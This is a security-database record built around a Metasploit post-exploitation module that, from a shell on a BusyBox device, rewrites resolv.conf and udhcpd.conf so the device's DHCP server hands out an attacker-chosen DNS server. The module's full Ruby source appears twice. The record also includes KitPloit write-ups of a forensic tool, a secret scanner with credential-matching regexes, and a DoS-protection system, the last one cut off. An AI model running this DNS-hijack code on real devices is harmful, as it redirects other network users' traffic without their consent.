ID MSF:POST/LINUX/BUSYBOX/SET_DNS Type metasploit Reporter Rapid7 Modified 2017-07-24T13:26:21
Description
This module runs on a session connected to a BusyBox shell. It sets the DNS server on the device running BusyBox so that the device's DHCP server hands that DNS server out to hosts on the network.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Post module for a session attached to a BusyBox shell: it rewrites the DNS
# settings in /etc/resolv.conf and /etc/udhcpd.conf and restarts the DHCP daemon.
#
# Device-side effects visible in this code, useful when reviewing a device for
# this activity: a "nameserver" line written to /etc/resolv.conf, an
# "option dns" line written to /etc/udhcpd.conf or to a "tmp.conf" copy in a
# writable directory, `killall dhcpd`, and a dhcpd process started in the
# background against one of those config files.
class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Linux::BusyBox

  # Declares the module metadata and registers the single required option, 'DNS'.
  def initialize
    # The %q{} body and its closing brace stay flush-left so the literal's bytes are unchanged.
    super(
      'Name' => 'BusyBox DNS Configuration',
      'Description' => %q{
This module will be applied on a session connected to a BusyBox shell. It allows
to set the DNS server on the device executing BusyBox so it will be sent by the
DHCP server to network hosts.
},
      'Author' => 'Javier Vicente Vallejo',
      'License' => MSF_LICENSE,
      'Platform' => ['linux'],
      'SessionTypes' => ['shell']
    )

    dns_option = OptAddress.new('DNS', [true, 'The dns server address'])
    register_options([dns_option])
  end

  # Entry point: handles each of the two config files only if it exists on the device.
  def run
    print_status('Searching for files to modify dns server.')
    modify_resolv_conf if busy_box_file_exist?('/etc/resolv.conf')
    modify_udhcpd_conf if busy_box_file_exist?('/etc/udhcpd.conf')
  end

  # Writes a "nameserver" line to /etc/resolv.conf and reports success.
  #
  # NOTE(review): the address comes from datastore['SRVHOST'], while the option
  # registered in initialize is named 'DNS' -- confirm which key is intended.
  # The third argument's meaning is defined in the BusyBox mixin, not shown here.
  def modify_resolv_conf
    print_status('File /etc/resolv.conf found')
    written = busy_box_write_file('/etc/resolv.conf', "nameserver #{datastore['SRVHOST']}", false)
    print_good('DNS server added to resolv.conf') if written
  end

  # Adds an "option dns" line to the udhcpd configuration and restarts the daemon.
  # If /etc/udhcpd.conf cannot be written, the file is copied to "tmp.conf" in a
  # writable directory, the copy is edited, and the daemon is restarted against it.
  #
  # NOTE(review): as in modify_resolv_conf, the value is read from
  # datastore['SRVHOST'] rather than the registered 'DNS' option.
  def modify_udhcpd_conf
    print_status('File /etc/udhcpd.conf found')
    dns_line = "option dns #{datastore['SRVHOST']}"

    return restart_dhcpd('/etc/udhcpd.conf') if busy_box_write_file('/etc/udhcpd.conf', dns_line, true)

    print_status('Unable to write udhcpd.conf, searching a writable directory...')
    writable_directory = busy_box_writable_dir
    return print_error('Writable directory not found') unless writable_directory

    # No separator is inserted, so the directory presumably ends in "/" -- verify in the mixin.
    # The path is interpolated unquoted into the shell command below.
    fallback_conf = "#{writable_directory}tmp.conf"
    print_status("Copying the original udhcpd.conf to #{fallback_conf}")
    cmd_exec("cp -f /etc/udhcpd.conf #{fallback_conf}")
    Rex.sleep(0.3)
    print_status("Adding DNS to #{fallback_conf}")
    # The result of this write is not checked; the restart and its success
    # message follow regardless.
    busy_box_write_file(fallback_conf, dns_line, true)
    restart_dhcpd(fallback_conf)
  end

  # Kills the running dhcpd and starts it again in the background with +conf+.
  #
  # @param conf [String] path of the configuration file passed to dhcpd
  def restart_dhcpd(conf)
    print_status('Restarting udhcp server')
    cmd_exec('killall dhcpd')
    # shell_write is used here on purpose. cmd_exec appends an echo to the command
    # it runs (<command>;echo <rand_value>), and BusyBox appears to fail to start
    # dhcpd when it is invoked as "dhcpd /etc/udhcpd.conf &; echo <rand_value>".
    relaunch = "dhcpd #{conf} &\n"
    session.shell_write(relaunch)
    print_good('udhcpd.conf modified and DNS server added. DHCPD restarted')
  end
end
{"id": "MSF:POST/LINUX/BUSYBOX/SET_DNS", "type": "metasploit", "bulletinFamily": "exploit", "title": "BusyBox DNS Configuration", "description": "This module will be applied on a session connected to a BusyBox shell. It allows to set the DNS server on the device executing BusyBox so it will be sent by the DHCP server to network hosts.\n", "published": "2015-08-28T14:17:23", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-12-28T15:20:29", "viewCount": 165, "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2019-12-28T15:20:29", "rev": 2}, "dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "ossfuzz", "idList": ["OSSFUZZ-23836"]}, {"type": "redhat", "idList": ["RHSA-2020:2774", "RHSA-2020:2783", "RHSA-2020:2777", "RHSA-2020:2779", "RHSA-2020:2592", "RHSA-2020:2780", "RHSA-2020:2773", "RHSA-2020:2770", "RHSA-2020:2781"]}, {"type": "exploitdb", "idList": ["EDB-ID:48629"]}, {"type": "talos", "idList": ["TALOS-2020-1088"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:158245", "PACKETSTORM:158266", "PACKETSTORM:158261"]}, {"type": "kitploit", "idList": ["KITPLOIT:1333834857311360725"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892262"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2020-2768.NASL", "REDHAT-RHSA-2020-2755.NASL"]}], "modified": "2019-12-28T15:20:29", "rev": 2}, "vulnersScore": 0.4}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/linux/busybox/set_dns.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n include Msf::Post::Linux::BusyBox\n\n def initialize\n super(\n 'Name' => 'BusyBox DNS Configuration',\n 'Description' => %q{\n This module will be applied on a 
session connected to a BusyBox shell. It allows\n to set the DNS server on the device executing BusyBox so it will be sent by the\n DHCP server to network hosts.\n },\n 'Author' => 'Javier Vicente Vallejo',\n 'License' => MSF_LICENSE,\n 'Platform' => ['linux'],\n 'SessionTypes' => ['shell']\n )\n\n register_options(\n [\n OptAddress.new('DNS', [ true, 'The dns server address' ])\n ])\n end\n\n def run\n print_status(\"Searching for files to modify dns server.\")\n if busy_box_file_exist?('/etc/resolv.conf')\n modify_resolv_conf\n end\n\n if busy_box_file_exist?('/etc/udhcpd.conf')\n modify_udhcpd_conf\n end\n end\n\n def modify_resolv_conf\n print_status('File /etc/resolv.conf found')\n if busy_box_write_file('/etc/resolv.conf', \"nameserver #{datastore['SRVHOST']}\", false)\n print_good('DNS server added to resolv.conf')\n end\n end\n\n def modify_udhcpd_conf\n print_status('File /etc/udhcpd.conf found')\n\n if busy_box_write_file('/etc/udhcpd.conf', \"option dns #{datastore['SRVHOST']}\", true)\n restart_dhcpd('/etc/udhcpd.conf')\n else\n print_status('Unable to write udhcpd.conf, searching a writable directory...')\n writable_directory = busy_box_writable_dir\n if writable_directory\n print_status(\"Copying the original udhcpd.conf to #{writable_directory}tmp.conf\")\n cmd_exec(\"cp -f /etc/udhcpd.conf #{writable_directory}tmp.conf\")\n Rex::sleep(0.3)\n print_status(\"Adding DNS to #{writable_directory}tmp.conf\")\n busy_box_write_file(\"#{writable_directory}tmp.conf\", \"option dns #{datastore['SRVHOST']}\", true)\n restart_dhcpd(\"#{writable_directory}tmp.conf\")\n else\n print_error('Writable directory not found')\n end\n end\n end\n\n def restart_dhcpd(conf)\n print_status('Restarting udhcp server')\n cmd_exec('killall dhcpd')\n # in this case it is necessary to use shell_write. Cmd_exec introduce an echo after the command\n # that is going to be executed: <command>;echo <rand_value>. 
It seems busybox fails to launch dhcpd\n # process when it is executed in this way: \"dhcpd /etc/udhcpd.conf &; echo <rand_value>\"\n session.shell_write(\"dhcpd #{conf} &\\n\")\n print_good('udhcpd.conf modified and DNS server added. DHCPD restarted')\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}
{"kitploit": [{"lastseen": "2021-02-28T15:38:09", "bulletinFamily": "tools", "cvelist": [], "description": "[  ](<https://1.bp.blogspot.com/--3Admoa99yk/YDSYFn648AI/AAAAAAAAVco/yY0lBQ_BVJwYn6lXPyPAF1rVDSwLTPqLgCNcBGAsYHQ/s300/gargamel_1_logo.png>)\n\n \n\n\nA Forensic Evidence Acquirer \n\n \n\n\n** Compile ** \n\n\nAssuming you have Rust 1.41+ installed. Open terminal in the project directory and to compile a release build type \n \n \n cargo build --release\n\nDebug build can be compiled using \n \n \n cargo build\n\nCompiled executable is located at ` target/release/gargamel.exe ` or ` target/debug/gargamel.exe ` , respectively. \n\n \n** Set log level ** \n\n\nIf you wish to change the logging level: \n\n * Open ` src/main.rs `\n * On lines 42 and 43 change ` LevelFilter::Info ` to (for example) ` LevelFilter::Trace ` for more detailed logging. \n * Beware that the ` LevelFilter::Trace ` will log everything including passwords. \n \n** User guide ** \n\n\nRight now, this app works only on Windows and the target computer must use Windows or Linux. \n\nMake sure to have the following programs in the same directory as Gargamel. \n\n * ` psexec ` , [ download ](<https://docs.microsoft.com/en-us/sysinternals/downloads/psexec> \"download\" )\n * ` paexec ` , an open source alternative to PsExec, [ download ](<https://www.poweradmin.com/paexec/> \"download\" )\n * ` winpmem ` , an open source memory image tool, [ download ](<https://github.com/Velocidex/c-aff4/releases> \"download\" ) . 
\n * Download the newest executable and rename it to _ winpmem.exe _\n * ` plink ` and ` pscp ` , an open source CLI SSH/SCP clients, [ download ](<https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html> \"download\" )\n * ` SharpRDP ` , an open source command executor using RDP, [ download ](<https://github.com/vildibald/SharpRDP/releases/tag/v1.0.0> \"download\" )\n * ` WMImplant ` , as open source [ PowerShell ](<https://www.kitploit.com/search/label/PowerShell> \"PowerShell\" ) WMI command executor, [ download ](<https://github.com/vildibald/WMImplant> \"download\" )\n * ` 7za.exe ` , a standalone console version of 7zip archiver, [ download ](<https://www.7-zip.org/download.html> \"download\" )\n\nNote: We need both the ` psexec ` and ` paexec ` . Although both applications are supposed to be functionally equivalent they actually both have different behavior under some circumstances. \n\n \n** Unleashing the power of Gargamel ** \n\n\nGargamel needs to be launched from an elevated terminal to be fully functional. Currently it does not support the UAC dialog nor any kind of notification when running with limited privileges. When running with limited user privileges, then some [ operations ](<https://www.kitploit.com/search/label/Operations> \"operations\" ) like target memory dumping will not work. \n\n \n** Basic example ** \n\n\nAssume you want to connect to a computer with the following parameters: \n\n * address ` 192.168.42.47 `\n * username ` Jano `\n * password ` nbusr123 `\n\nThe following command will acquire firewall state, network state, logged users, running processes, active network connections, registry, system & application event logs using PsExec method. Evidence will be stored in the ` testResults ` directory relative to the location of Gargamel. \n \n \n gargamel.exe -c 192.168.42.47 -u Jano --psexec -o testResults\n\nGargamel will ask you for password of the remote user, in our example the password is ` nbusr123 ` . 
Note that password will be hidden when typing. \n\nIt is also possible to specify the password directly as program argument. \n \n \n gargamel.exe -c 192.168.42.47 -u Jano --psexec -p nbusr123 -o testResults\n\n \n** Domain example ** \n\n\nAssume you want to connect to a computer in a domain with the following parameters: \n\n * domain ` WORKSPACE `\n * computer name ` JanovPC `\n * username ` Jano `\n * password ` nbusr123 `\n\nThe following command will acquire firewall state, network state, logged users, running processes, active network connections, registry, system & application event logs using PsExec method. \n \n \n gargamel.exe -c JanovPC -u Jano -d WORKSPACE --psexec -o testResults\n\nOr to skip password prompting specify the password directly. \n \n \n gargamel.exe -c JanovPC -u Jano -d WORKSPACE --psexec -p nbusr123 -o testResults\n\n \n** Other connection methods ** \n\n\nPsExec is one of the 5 supported connection methods. You can replace the ` --psexec ` with the following options: \n\n * ` --psexec `\n * ` --psrem ` , if PowerShell remoting is configured on target machine. \n * ` --rdp ` , if RDP is enabled on target machine. \n * ` --wmi ` . \n * ` --ssh ` , if target machine uses Linux. \n\nIt is possible to use several methods at once. For example to use both PsExec and RDP one can use the following command. \n \n \n gargamel.exe -c 192.168.42.47 -u Jano --psexec --rdp -o testResults\n\nThere is also a special switch ` --all ` that is equal to specifying ` --psexec --rdp --psrem --wmi ` . \n\nNote: Launch parameters are order-agnostic, i.e. it does not matter in which order the parameters are specified. \n\n \n** Acquire memory ** \n\n\nTo acquire also memory dump, then simply add the ` -m ` flag to the program parameters, i.e. \n \n \n gargamel.exe -c 192.168.42.47 -u Jano --psexec -o testResults -m\n\nIf you wish to acquire ONLY the memory dump without other evidence then use the following command. 
\n \n \n gargamel.exe -c 192.168.42.47 -u Jano --psexec -o testResults -m --no-events-search --no-evidence-search --no-registry-search \n\nThis functionality is available only for Windows targets. \n\n \n** Run custom commands ** \n\n\nGargamel may run custom Windows CMD or Linux shell commands on remote machine. \n\nFirst create a file ` custom-commands.txt ` with the following content. \n \n \n # Will be run using any method \n ipconfig \n # Will run only when launching with at least one of --all, --psexec, --wmi methods \n :psexec:wmi ipconfig -all\n\nResults of the above commands will be stored in the directory specified by ` -o ` option. \n\nTo run the above commands written in ` custom-commands.txt ` use the ` -e ` switch, i.e. \n \n \n gargamel.exe -c 192.168.42.47 -u Jano --psexec -o testResults -e custom-commands.txt \n\n \n** Download custom files ** \n\n\nGargamel is able to download remote files. \n\nFirst create a file ` custom-files.txt ` with the following content. \n \n \n C:\\Users\\Public\\sss* \n C:\\Users\\Jano\\danove.pdf \n # This line and the next one will be ignored \n # C:\\Users\\Jano\\somBajecny.pptx \n\n \n** Note: Wildcards * and ? are supported but currently only in filenames, not parent directories, i.e. C:\\Users\\J*\\danove.pdf will most likely not work. ** \n\n\nResults of the above commands will be stored in the directory specified by ` -o ` option. \n\nTo run the above commands written in ` custom-files.txt ` use the ` -s ` switch, i.e. \n \n \n gargamel.exe -c 192.168.42.47 -u Jano --psexec -o testResults -s custom-files.txt \n\n \n** All options ** \n\n\nAll supported switches are described below. \n \n \n USAGE: \n gargamel.exe [FLAGS] [OPTIONS] --user <user> \n \n FLAGS: \n -a, --all Acquire evidence from Windows machine using all supported methods (PsExec, PsRemote, \n WMI, RDP). \n --no-events-search Disables Windows event logs acquisition. 
\n --no-evidence-search Disables acquisition of evidence that can be usually downloaded quickly (like ipconfig, \n firewall status etc..) \n --no-registry-search Disables target registry acquisition. \n -h, --help Prints help information \n -m, --mem-image Optional: Memory dump of a target Windows machine. \n --local Acquire evidence from local machine. \n --nla Optional: Use network level authentication when using RDP. (Windows targets only) \n --no-7z Optional: Disable 7zip c ompression for registry & memory images.This will significantly \n decrease the running time, but WMI and RDP connections will probably not work properly. \n (Windows targets only) \n --psexec Acquire evidence from Windows machine using PsExec. Requires both PsExec64.exe and \n paexec.exe in the current directory or in the path. \n --psrem Acquire evidence from Windows machine using PowerShell. Requires both PsExec64.exe and \n paexec.exe in the current directory or in the path. \n --rdp Acquire evidence from Windows machine using RDP. Requires SharpRDP.exe in the current \n directory or in the path. \n --ssh Acquire evidence from Linux machine using SSH. Requires both plink.exe and pscp.exe in \n the current directory or in the path. \n -V, --version Prints version information \n --wmi Acquire evidence from Windows machine using WMI. Requires WMImplant.ps1 in the current \n directory or in the path and PowerShell 3.0+ on the host machine.Note: It is necessary \n to disable [Windows Defender](<https://www.kitploit.com/search/label/Windows%20Defender> \"Windows Defender\" ) real-time [protection](<https://www.kitploit.com/search/label/Protection> \"protection\" ) (other AVs not tested). \n \n OPTIONS: \n -c, --computer <computer> Remote computer address/name. 
[default: 127.0.0.1] \n -u, --user <user> Remote user name \n -d, --domain <domain> Optional: Remote Windows domain \n -o, --output <local-store-directory> \n Name of local directory to store the evidence [default: evidence-output] \n \n -p, --password <password> \n Optional: Remote user password. Skipping this option will prompt a possibility to put a password in hidden \n way.To specify an empty password use `-p \"\"` \n \n --redownload <re-download> \n Optional: Download and DELETE specified file from target computer. Use this in case of previous failed \n partially completed operation. For just downloading a file (without deleting it) please use a `search` \n switch. If you specify a 7zip chunk (.7z.[chunk-number], e.g. .7z.004), then it will also automatically try to \n download subsequent chunks.Use also with --psexec --psrem, --rdp, --wmi, --all \n \n -r, --remote-storage <remote-store-directory> \n Name of [remote directory](<https://www.kitploit.com/ search/label/Remote%20Directory> \"remote directory\" ) to be used as a temporary storage. (Windows targets only) [default: \n C:\\Users\\Public] \n \n -e, --commands <custom-command-path> Optional: File with custom commands to execute on remote computer \n \n -s, --search <search-files-path> \n Optional: File with files names to be searched on remote computer. File names supports also `*` and `?` \n wildcards on file names (but not yet parent directories). \n \n --key <ssh-key> Optional: Name/path of SSH private key file. 
(Linux target only) \n \n --timeout <timeout> \n Optional: Timeout in seconds for long running operations.This option is a workaround for a bug in \n WMImplant.ps1 amd SharpRDP.exe where finishing of a long running operation cannot sometimes properly close \n the connection leaving the Gargamel in seemingly frozen state or executing the next operation with the \n previous one unfinished on target site.Increasing this timeout may solve issues when acquiring registry or \n memory image from target machine. [default: 300] \n \n\n \n** Known issues ** \n\n\n * WMI cannot write its output to file with symbol ` _ ` in its path/name. \n \n \n\n\n** [ Download Gargamel ](<https://github.com/Lifars/gargamel> \"Download Gargamel\" ) **\n", "edition": 1, "modified": "2021-02-28T11:30:02", "published": "2021-02-28T11:30:02", "id": "KITPLOIT:6715981344528147603", "href": "http://www.kitploit.com/2021/02/gargamel-forensic-evidence-acquirer.html", "title": "Gargamel - A Forensic Evidence Acquirer", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-28T01:35:17", "bulletinFamily": "tools", "cvelist": [], "description": "[  ](<https://1.bp.blogspot.com/-ZWk2fsNEijY/YDSXFqWl0QI/AAAAAAAAVcg/iFebecVmdP41ncNbc9fkh4kDKrkSPKwFACNcBGAsYHQ/s1752/pillager_1_brand_image_ice.png>)\n\n \n\n\nPillager is designed to provide a simple means of leveraging Go's strong concurrency model to recursively search directories for [ sensitive information ](<https://www.kitploit.com/search/label/Sensitive%20Information> \"sensitive information\" ) in files. Pillager does this by standing on the shoulders of [ a few giants ](<https://github.com/brittonhayes/pillager#shoulders-of-giants> \"a few giants\" ) . Once pillager finds files that match the specified pattern, the file is scanned using a series of concurrent workers that each take a line of the file from the job queue and hunt for sensitive pattern matches. 
The available pattern filters can be defined in a rules.toml file or you can use the default ruleset. \n\n \n\n\n** Installation ** \n \n** Go ** \n\n\nIf you have Go setup on your system, you can install Pillager with ` go get `\n \n \n go get github.com/brittonhayes/pillager\n\n \n** Scoop (Windows) ** \n\n \n \n scoop bucket add pillager https://github.com/brittonhayes/pillager-scoop.git \n scoop install pillager\n\n \n** Homebrew (OSX/Linux) ** \n\n \n \n brew tap brittonhayes/homebrew-pillager \n brew install pillager\n\nIf you're looking for a binary, check the latest releases for the executable that matches your system \n\n \n** Usage ** \n\n\nTo see all the commands available with ` pillager `\n \n \n # To see instructions for the entire application \n pillager \n \n # From any subcommand \n pillager [cmd] --help\n\n \n** Configuration ** \n \n** Gitleaks Rules ** \n\n\nPillager provides full support for [ Gitleaks ](<https://github.com/zricethezav/gitleaks> \"Gitleaks\" ) rules. This can either be passed in with a [ rules.toml ](<https://github.com/brittonhayes/pillager/blob/main/rules.toml> \"rules.toml\" ) file, or you can use the default ruleset by leaving the rules flag blank. \n \n \n # rules.toml \n title = \"pillager rules\" \n \n [[rules]] \n description = \"AWS Access Key\" \n regex = '''(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}''' \n tags = [\"key\", \"AWS\"] \n [[rules.entropies]] \n Min = \"3.5\" \n Max = \"4.5\" \n Group = \"1\" \n \n [[rules]] \n description = \"Email Address\" \n regex = '''(?i)([A-Za-z0-9!#$%&'*+\\/=?^_{|.}~-][email\u00a0protected](?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?)''' \n tags = [\"email\", \"User Info\"]\n\n \n** Custom Templates ** \n\n\nPillager allows you to use powerful ` go text/template ` to customize the output format. Here are a few template examples. 
\n\n \n** Basic ** \n\n \n \n {{/*basic.tmpl*/}} {{ range .Leaks}} Leak: {{.Line}} Line: {{.LineNumber}} File: {{ .File }} {{end}} \n\n \n** Markdown Styling ** \n\n \n \n {{/*markdown.tmpl*/}} # Results {{ range .Leaks}} ## {{ .File }} - Location: {{.LineNumber}} {{end}} \n\n \n** Documentation ** \n\n\n\uf4da \n\n[ View the docs ](<https://github.com/brittonhayes/pillager/blob/main/hunter> \"View the docs\" )\n\nGoDoc documentation is available on [ pkg.go.dev for pillager ](<https://pkg.go.dev/github.com/brittonhayes/pillager> \"pkg.go.dev for pillager\" ) but it also available for all packages in the [ ./pkg ](<https://github.com/brittonhayes/pillager/blob/main/pkg> \"./pkg\" ) directory. Just open the folder of any package, and you'll see the GoDocs rendered in beautiful Github-flavored markdown thanks to the awesome [ gomarkdoc ](<https://github.com/princjef/gomarkdoc> \"gomarkdoc\" ) tool. \n\n \n** Shoulders of Giants \n\n \n\n\n** ** [ afero's Cobra ](<https://github.com/spf13/cobra> \"afero's Cobra\" ) ** \n\n\n** What is Cobra? **\n\n> Cobra is a [ library ](<https://www.kitploit.com/search/label/Library> \"library\" ) providing a simple interface to create powerful modern CLI interfaces similar to git & go tools. Cobra is also an application that will generate your application scaffolding to rapidly develop a Cobra-based application. \n\nIf you've seen a CLI written in Go before, there's a pretty high chance it was built with Cobra. I can't recommend this library enough. It empowers developers to make consistent, dynamic, and self-documenting [ command line ](<https://www.kitploit.com/search/label/Command%20Line> \"command line\" ) tools with ease. Some examples include ` kubectl ` , ` hugo ` , and Github's ` gh ` CLI. \n\n \n** [ Gitleaks ](<https://github.com/zricethezav/gitleaks> \"Gitleaks\" ) ** \n\n\n** What is Gitleaks? **\n\n> Gitleaks is a SAST tool for detecting hardcoded secrets like passwords, api keys, and tokens in git repos. 
\n\nGitleaks is an amazing tool for secret leak prevention. If you haven't implemented [ Gitleaks ](<https://www.kitploit.com/search/label/Gitleaks> \"Gitleaks\" ) as a pre-commit checker, it's worth your time to check it out. \n\n** Why is Gitleaks relevant to Pillager? **\n\nPillager implements the powerful [ rules ](<https://github.com/zricethezav/gitleaks#rules-summary> \"rules\" ) functionality of Gitleaks while taking a more offensive approach to working with the secrets found. While I have provided a baseline set of default rules, Pillager becomes much more powerful if you allow users to create rules for their own use-cases. \n\n> This goes without saying but I'm going to say it anyways: I am ** not ** responsible for any repercussions caused by your use of pillager. This tool is intended for defensive, [ Blue Team ](<https://www.kitploit.com/search/label/Blue%20Team> \"Blue Team\" ) use. \n\n \n \n\n\n** [ Download Pillager ](<https://github.com/brittonhayes/pillager> \"Download Pillager\" ) **\n", "edition": 1, "modified": "2021-02-27T20:30:11", "published": "2021-02-27T20:30:11", "id": "KITPLOIT:7351222972556330399", "href": "http://www.kitploit.com/2021/02/pillager-filesystems-for-sensitive.html", "title": "Pillager - Filesystems For Sensitive Information With Go", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-27T15:36:38", "bulletinFamily": "tools", "cvelist": [], "description": "[  ](<https://1.bp.blogspot.com/-j6qJf4KVxis/YDSWmqHjkMI/AAAAAAAAVcY/M87B9bvR-hYw9laisRtIX0kwA3Nfo6atACNcBGAsYHQ/s808/DDoS%2BProtection.png>)\n\n \n\n\nGatekeeper is the first open source DoS [ protection ](<https://www.kitploit.com/search/label/Protection> \"protection\" ) system. It is designed to scale to any peak bandwidth, so it can withstand DoS attacks both of today and of tomorrow. 
In spite of the geographically [ distributed ](<https://www.kitploit.com/search/label/Distributed> \"distributed\" ) architecture of Gatekeeper, the network policy that describes all decisions that have to be enforced on the incoming [ traffic ](<https://www.kitploit.com/search/label/Traffic> \"traffic\" ) is centralized. This centralized policy enables network operators to leverage distributed algorithms that would not be viable under very high latency (e.g. distributed databases) and to fight multiple multi-vector DoS attacks at once. \n\nThe intended users of Gatekeeper are network operators of institutions, service and content providers, enterprise networks, etc. It is not intended to be used by individual Internet users. \n\nFor more information, see the [ Gatekeeper wiki ](<https://github.com/AltraMayor/gatekeeper/wiki> \"Gatekeeper wiki\" ) . \n\n \n\n\n** How to Set Up ** \n \n** Configure Hugepages ** \n\n\nDPDK requires the use of hugepages; instructions for mounting hugepages are available in the [ requirements documentation ](<http://doc.dpdk.org/guides/linux_gsg/sys_reqs.html#use-of-hugepages-in-the-linux-environment> \"requirements documentation\" ) . On many systems, the following hugepages setup is sufficient: \n \n \n $ echo 256 | sudo tee /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages \n \n\n \n** Option 1: Obtain Packages ** \n\n\nDebian packages for Gatekeeper are available at the project's [ Releases ](<https://github.com/AltraMayor/gatekeeper/releases> \"Releases\" ) page. 
\n\n \n** Install ** \n\n\nOnce the packages are downloaded, they can be installed with the commands below: \n \n \n $ tar -zxvf gatekeeper-ubuntu-18.04-packages.tar.gz \n $ cd gatekeeper-ubuntu-18.04-packages \n $ sudo dpkg -i libgkrte-*.deb \\ \n libgkdpdk-dev_*_amd64.deb \\ \n gatekeeper-dpdk_*_amd64.deb \\ \n gatekeeper-dpdk-dev_*_amd64.deb \\ \n gatekeeper-dpdk-igb-uio-dkms_*_amd64.deb \\ \n gatekeeper-dpdk-rte-kni-dkms_*_amd64.deb \\ \n gatekeeper-bird_*_amd64.deb \\ \n gatekeeper_*_amd64.deb \n \n\nThe ` gatekeeper-dpdk-dev ` package is a dependency of the DKMS packages, which build their respective kernel modules during package installation and kernel upgrades. \n\n \n** Configure Network Adapters ** \n\n\nEdit the ` /etc/gatekeeper/envvars ` file and insert names of the network adapters to be bound to DPDK. For example: \n \n \n GATEKEEPER_INTERFACES=\"eth0 eth1\" \n \n\nAlternatively, the interfaces' PCI addresses can be specified: \n \n \n GATEKEEPER_INTERFACES=\"0000:00:07.0 0000:00:08.0\" \n \n\nIn the same file, you can optionally specify [ Environmental Abstraction Layer options ](<https://doc.dpdk.org/guides/linux_gsg/linux_eal_parameters.html> \"Environmental Abstraction Layer options\" ) in the ` DPDK_ARGS ` variable and [ Gatekeeper-specific options ](<https://github.com/AltraMayor/gatekeeper/wiki/Configuration#application-configuration> \"Gatekeeper-specific options\" ) in ` GATEKEEPER_ARGS ` . \n\n \n** How to run ** \n\n\nRun the commands below to start Gatekeeper and to ensure it is started automatically on reboots. 
\n \n \n $ sudo systemctl start gatekeeper \n $ sudo systemctl enable gatekeeper \n \n\n \n** Option 2: Build from Source ** \n \n** Install Dependencies ** \n\n\nInstall the following software dependencies: \n \n \n $ sudo apt-get update \n $ sudo apt-get -y -q install git clang devscripts doxygen hugepages \\ \n build-essential linux-headers-`uname -r` libmnl0 libmnl-dev \\ \n libkmod2 libkmod-dev libnuma-dev libelf1 libelf-dev libc6-dev-i386 \\ \n autoconf flex bison libncurses5-dev libreadline-dev \n \n\nNote: Both ` libmnl0 ` and ` libmnl-dev ` are needed to compile and run ` gatekeeper ` , but only ` libmnl0 ` is needed for simply running ` gatekeeper ` . Both ` libkmod2 ` and ` libkmod-dev ` are needed to compile and run ` gatekeeper ` , but only ` libkmod2 ` is needed for simply running ` gatekeeper ` . ` libnuma-dev ` is needed to compile the latest DPDK and to support NUMA systems. The package ` libelf-dev ` is needed to compile DPDK with support to reading BPF programs from ELF files, but only ` libelf1 ` is needed to run it. The package ` libc6-dev-i386 ` is needed to compile the BPF programs in the folder ` bpf/ ` . The ` autoconf ` , ` flex ` , ` bison ` , ` libncurses5-dev ` , and ` libreadline-dev ` packages are for BIRD. The ` devscripts ` package is used to build Gatekeeper [ Debian ](<https://www.kitploit.com/search/label/Debian> \"Debian\" ) packages. \n\nTo use DPDK, make sure you have all of the [ environmental requirements ](<http://dpdk.org/doc/guides/linux_gsg/sys_reqs.html#running-dpdk-application> \"environmental requirements\" ) . 
\n\n \n** Clone Repository ** \n\n\nClone the Gatekeeper repository, including the submodules that contain Gatekeeper dependencies: \n \n \n $ git clone --recursive http://github.com/AltraMayor/gatekeeper.git \n \n\nIf you do not use the ` --recursive ` clone option, you need to obtain the submodules that contain the dependences from within the ` gatekeeper ` directory: \n \n \n $ git submodule init \n $ git submodule update \n \n\n \n** Compile ** \n\n\nThis section explains how to build Gatekeeper manually. If you want to build Debian packages, refer to the section [ How to build packages ](<https://github.com/AltraMayor/gatekeeper#how-to-build-packages> \"How to build packages\" ) . \n\nWhile in the ` gatekeeper ` directory, run the setup script: \n \n \n $ . setup.sh \n \n\nThis script compiles DPDK, LuaJIT, and BIRD, and loads the needed kernel modules. Additionally, it saves the interface names and their respective PCI addresses in the file ` lua/if_map.lua ` so that interface names can be used in the Gatekeeper configuration files. \n\nIt also sets two environmental variables: ` RTE_SDK ` and ` RTE_TARGET ` . They must be set before ` gatekeeper ` will compile. \n\nAfter running the setup script, you may want to save the environmental variables in your shell's preferences file. For example, in Bash, you can do: \n \n \n $ echo \"export RTE_SDK=${RTE_SDK}\" >> ${HOME}/.profile \n $ echo \"export RTE_TARGET=${RTE_TARGET}\" >> ${HOME}/.profile \n \n\nOtherwise, each time you login you will need to set these environmental variables again. \n\nOnce DPDK is compiled and the variables are set, ` gatekeeper ` can be compiled: \n \n \n $ make \n \n\n \n** Configure Network Adapters ** \n\n\nBefore ` gatekeeper ` can be used, the network adapters must be bound to DPDK. For this, you can use the script ` dependencies/dpdk/usertools/dpdk-devbind.py ` . 
